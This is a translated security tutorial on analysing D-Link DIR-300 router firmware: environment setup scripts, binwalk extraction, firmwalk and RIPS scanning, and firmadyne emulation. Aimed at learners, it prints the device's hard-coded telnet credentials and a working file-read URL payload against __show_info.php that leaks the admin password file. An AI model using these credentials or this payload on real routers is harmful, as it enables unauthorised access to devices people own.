Introduction
In recent years, IoT devices have infiltrated every aspect of life, bringing great convenience to people. However, due to the data and privacy information generated in daily life, their security has become a growing concern. In the previous article, we discussed controlling Xiaomi devices using scripts, focusing on security analysis from a traffic perspective; in this article, we will analyze the vulnerabilities of firmware.
Beginning
“To do a good job, one must first sharpen one’s tools.” Before we begin, let’s talk about setting up the firmware analysis environment, mainly the installation of binwalk. Since there are many ways to compress and package firmware, installing it with just the command apt install binwalk may not support decompressing many file system formats. You need to install various decompression plugins to correctly extract the file systems from the firmware. For a complete installation, refer to the official binwalk installation documentation. However, since manually installing it every time is quite cumbersome, I wrote an installation script to automate the process.
At the same time, considering that many dependency packages need to be installed, the apt source provided by the Ubuntu system is very slow for downloading. You can change it to Alibaba Cloud’s source, mainly referring to this article. But following the post every time is quite time-consuming, so I also wrote a script to automatically change the source as shown below.
#!/bin/bash
# [*]change ubuntu system sources to aliyun source
#:<<BLOCK
sudo mv /etc/apt/sources.list /etc/apt/sources.list.bak.1
codename=`lsb_release -c | cut -c 11-`
echo "codename is $codename"
sudo touch /etc/apt/sources.list
sudo echo "deb http://mirrors.aliyun.com/ubuntu/ $codename main restricted universe multiverse" >> /etc/apt/sources.list
sudo echo "deb-src http://mirrors.aliyun.com/ubuntu/ $codename main restricted universe multiverse" >> /etc/apt/sources.list
sudo echo "deb http://mirrors.aliyun.com/ubuntu/ $codename-security main restricted universe multiverse" >> /etc/apt/sources.list
sudo echo "deb-src http://mirrors.aliyun.com/ubuntu/ $codename-security main restricted universe multiverse" >> /etc/apt/sources.list
sudo echo "deb http://mirrors.aliyun.com/ubuntu/ $codename-updates main restricted universe multiverse" >> /etc/apt/sources.list
sudo echo "deb-src http://mirrors.aliyun.com/ubuntu/ $codename-updates main restricted universe multiverse" >> /etc/apt/sources.list
sudo echo "deb http://mirrors.aliyun.com/ubuntu/ $codename-backports main restricted universe multiverse" >> /etc/apt/sources.list
sudo echo "deb-src http://mirrors.aliyun.com/ubuntu/ $codename-backports main restricted universe multiverse" >> /etc/apt/sources.list
sudo echo "deb http://mirrors.aliyun.com/ubuntu/ $codename-proposed main restricted universe multiverse" >> /etc/apt/sources.list
sudo echo "deb-src http://mirrors.aliyun.com/ubuntu/ $codename-proposed main restricted universe multiverse" >> /etc/apt/sources.list
sudo apt-get update
#BLOCK
# [*]change pip sources to aliyun source
if [ ! -d ~/.pip ];then
mkdir ~/.pip
fi
if [ -f ~/.pip/pip.conf ];
then
sudo mv ~/.pip/pip.conf ~/.pip/pip.conf.bak
sudo touch ~/.pip/pip.conf
else
sudo touch ~/.pip/pip.conf
fi
sudo echo "[global]" >> ~/.pip/pip.conf
sudo echo "index-url = https://mirrors.aliyun.com/pypi/simple" >> ~/.pip/pip.confIn the script, it is mainly divided into two parts: first, changing the Ubuntu system’s source to Alibaba Cloud’s source, and forming a targeted apt source file according to the different codename of the Ubuntu system; then changing the pip source to Alibaba Cloud’s source as well. After changing the source, the installation speed has increased dozens of times.
Next, we will install the full version of binwalk. I have downloaded the installation files and related plugins from GitHub (which are integrated in the tools section below), as shown in the figure below.
The installation script is: install_binwalk.sh, as shown below, which is written according to the official installation plan (although the official has a ./deps.sh automatic installation script, the installation is very slow and not very usable). This script currently only supports Python 2.7.
#!/bin/bash
#dependencies
sudo apt -y install python-lzma python-crypto
sudo apt -y install libqt4-opengl python-opengl python-qt4 python-qt4-gl python-numpy python-scipy python-pip
sudo pip install pyqtgraph
sudo pip install capstone
# Install standard extraction utilities(必选)
sudo apt -y install mtd-utils gzip bzip2 tar arj lhasa p7zip p7zip-full cabextract cramfsswap squashfs-tools sleuthkit default-jdk lzop srecord
#Install binwalk
#sudo apt-get install binwalk
cd binwalk
sudo python setup.py install
cd ..
# Install sasquatch to extract non-standard SquashFS images(必选)
sudo apt -y install zlib1g-dev liblzma-dev liblzo2-dev
cd sasquatch && sudo ./build.sh
cd ..
# Install jefferson to extract JFFS2 file systems(可选)
sudo pip install cstruct
cd jefferson && sudo python setup.py install
cd ..
# Install ubi_reader to extract UBIFS file systems(可选)
sudo apt -y install liblzo2-dev python-lzo
cd ubi_reader && sudo python setup.py install
cd ..
# Install yaffshiv to extract YAFFS file systems(可选)
cd yaffshiv && sudo python setup.py install
cd ..
#install unstuff (closed source) to extract StuffIt archive files
sudo cp stuff/bin/unstuff /usr/local/bin/Running this script, once binwalk is installed, most firmware can be extracted. Here, taking the D-Link DIR-300 as an example, it is provided in the binwalk installation package. Run the command: binwalk -Me DIR-300_REVA_FIRMWARE_1.06B05_WW.zip
This is the extraction process, where the squashfs file system is recognized and extracted.
The system file directory is shown in the above image, and it has been extracted. The next step is to analyze the files within.
Main Content
1. Remote Login Password Analysis
Long ago, I thought about how many firmware have exposed seemingly simple but very harmful security vulnerabilities, such as weak password logins, web vulnerabilities, etc. If there were a script that could automatically discover these simple security vulnerabilities, it would indeed save a lot of time. However, what I could think of, others have already implemented, see the project firmwalk. It is very simple to run; in the current system path, run:
firmwalk.sh firmware_file_system_pathFollowed by the path of the firmware’s file system. Taking D-Link DIR-300 as an example, the results are as follows.
This is a partial screenshot after the script runs. You can see that files containing keywords like admin, root, password, etc. have been listed. These files may contain password information. Let’s try to find whether these files contain password information, such as telnet, ftp, ssh, web, etc., which may have hard-coded passwords in the files. From the above image, the keyword telnet was found, and it appeared in the /etc/scripts/system.sh file. This file is a script file that starts with the system, which indicates that the telnet service starts with the system. Following this clue, it should be promising. Opening this file, I indeed found the telnet startup script, as shown in the image below.
Looking at this file with vim, as shown below:
The red box indicates the telnet startup command. Hey, the -u option seems to follow the username and password, with the username being: Alphanetworks, and the password is a variable, which is the value of cat /etc/config/image_sign. Let’s see what this value is, as shown in the image below.
The password is: wrgg19cdlwbr_dir300. By following the clues, it is easy to find. So why is it certain that the -u option must be the username and password? You can check in telnetd. Open this binary file with vim and search for the password, as shown in the image below.
The image has already provided the usage of telnetd. At the same time, searching for the telnet password of this firmware online also reveals this password, indicating that the correct one has been found.
In addition, in some other firmware, there may be files like /etc/passwd or /etc/passwd.bak, which can be cracked using the john command, as shown in the image below.
It was cracked, and the password is admin:1234.
2. Simple Web Vulnerability Discovery and Exploitation
Most firmware supports web access, and in the extracted firmware files, you can directly view the firmware’s webpage source code. So is there a tool that can discover some simple vulnerabilities through source code auditing? Of course, there is. Here is a simple PHP code auditing tool called RIPS. It uses static analysis techniques to automatically dig out potential security vulnerabilities in PHP source code. First, let’s take a look at its installation. Since this tool is also written in PHP, we first need to set up the PHP and web service runtime environment. Install the following programs:
sudo apt install apache2 php7.2 libapache2-mod-php7.2sudo /etc/init.d/apache2 restartDownload RIPS, the download address can be found here; once downloaded, unzip it and place it in the /var/www/html/ directory, as shown in the image below.
Then access this path in the browser: 127.0.0.1/rips.
In the path/file section, fill in the source code of the webpage to be analyzed, enter the path of the firmware webpage source code, and click scan to see the results, as shown below.
Scanned 320 files, Nothing vulnerable found, nothing was found~~. But it’s okay, just a simple verification of RIPS’s capabilities because some vulnerabilities in the D-Link DIR-300 series have been exposed online. For example, this information leakage vulnerability appears in the suashfs-root/www/model/_showinfo.php file, as shown in the image below.
Here we see that the $REQUIRE_FILE parameter has been prohibited from being set to var/etc/httpasswd and var/etc/hnapasswd. At first glance, we cannot obtain the account password. However, we can start the configuration of the httpasswd path from the root path, which allows us to bypass this filter. Payload:
localhost/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswdHere, setting REQUIRE_FILE=/var/etc/httpasswd successfully bypasses the above if judgment, allowing arbitrary file reading. Such vulnerabilities still require manual auditing to discover. Now the question is, how do we verify the weaknesses we have found?
Firmware Simulation
The environment for firmware simulation is something I have set up before, and I found it quite cumbersome. I initially planned to write a script to automate it. However, someone has already implemented it and packaged it into a virtual machine for direct use. AttifyOS, check it out, packaged by a foreign expert. After downloading, run the program in tools/firmadyne to simulate the D-Link DIR-300 firmware, with the command:
python fat.py ./DIR-300_REVA_FIRMWARE_1.06B05_WW.zip
As shown in the image above, when the network card is simulated, it indicates that the firmware simulation is successful. We can then check whether the vulnerabilities discovered above exist. First, let’s take a look at the web vulnerability by running in the browser:
192.168.0.1/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd
As shown in the image above, the password has been found, with the username being admin and the password being empty. Using the obtained password to attempt to log in, we successfully entered the web system, as shown in the image below.
Now, let’s see if the telnet password can succeed. First, use nmap to scan to see if the telnet service is enabled, as shown in the image below.
As shown in the image above, port 23 is already open, indicating that the telnet service starts with the system. Let’s try to log in via telnet, as shown in the image below.
Telnet has provided connection information, and it seems to have connected, but it did not prompt for a password, and executing commands did not return any output. The telnet service seems to have issues. To further verify, we could download other versions of the DIR-300 firmware or buy a device to test. However, although it was not successful, the entire process is clear. Below are the tools used in the entire process, and the installation environment setup and tools used in this article can be found at the following link:
https://github.com/scu-igroup/firmware_analysis
The tool file structure on GitHub:
change_sources.sh……….….Script to change Ubuntu system source and pip source
Installfullbinwalk……………Script to install the full version of binwalk
firmwalk……………………..….Firmware analysis tool
rips………………………………PHP source auditing tool
Conclusion
Thus, the content of firmware security analysis has been completed. Although it seems simple, there is already a considerable workload for beginners. Just the analysis environment setup can be quite challenging for those unfamiliar with Linux. However, by patiently taking it step by step, there will always be gains. In this article, I wrote multiple scripts to assist everyone in setting up the analysis environment, and used multiple tools to assist in discovering firmware vulnerabilities while explaining how to use firmware simulation to verify vulnerabilities. For advanced vulnerability discovery, it relies on continuous learning and analysis. This article is just a starting point; everyone is welcome to discuss and recommend some good firmware analysis methods for collective learning.
References
1. https://github.com/ReFirmLabs/binwalk/blob/master/INSTALL.md
2. https://blog.csdn.net/zhangjiahao14/article/details/80554616
3. https://github.com/craigz28/firmwalker
4. https://sourceforge.net/projects/rips-scanner/
5. https://github.com/adi0x90/attifyos
*This article is authored by scu-igroup and belongs to the FreeBuf original reward program. Unauthorized reproduction is prohibited.
Leave a Comment
Your email address will not be published. Required fields are marked *